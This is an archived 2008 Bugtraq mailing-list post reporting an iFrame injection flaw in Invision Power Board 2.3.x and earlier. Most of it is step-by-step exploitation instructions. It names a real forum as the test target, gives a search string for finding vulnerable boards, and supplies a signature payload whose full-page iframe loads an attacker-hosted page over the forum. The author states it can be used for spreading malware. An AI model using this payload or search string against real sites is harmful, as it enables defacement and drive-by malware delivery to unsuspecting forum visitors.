lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080326161901.12823.qmail@securityfocus.com>
Date: 26 Mar 2008 16:19:01 -0000
From: shaheemirza@...il.com
To: bugtraq@...urityfocus.com
Subject: Invision Power Board <=2.3.x iFrame Vuln

#######################################################
Tested On: http://www.abarjigs.com/forum/
Effected on:Invision Power Board <=2.3.x 
Type:Signature With iFrame
Discovered By:CYBER.DARK.HIMU (SHAHEE_MIRZA)
Google: "style designed by Soi" or "Powered by IP.Board 2.3.1"
Mail: cyber.dark.himu@...il.com,shaheemirza@...il.com
#######################################################

HI TO ALL.

HOW TO USE THIS VULN?

ANSWERE IS BELOW>>>>>>>

1.REG WITH VICTIM FORUM
2.GO TO USER CONTROL PANEL
3.EDIT YOUR SIGNATURE ByTHIS CODE

Code: Select all
<html>
<head>
<title>HACKED BY YOUR-NAME</title>
</head>
<body>
<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0">
<iframe name="iFrame1" width=1024 height=3186 src="http://YOUR-SITE/YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe>
</div>
</body>
</html>


4.AFTER THAT U WILL SEE ALL THE PAGE IS COVERED BY YOUR PAGE

5.GO ANY TOPIC AND POST ANYTHING.
6.AFTER THAT SEE "THE BOOM"
##########################################################

######U CAN USE IT FOR SPREADING MALWARE#################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ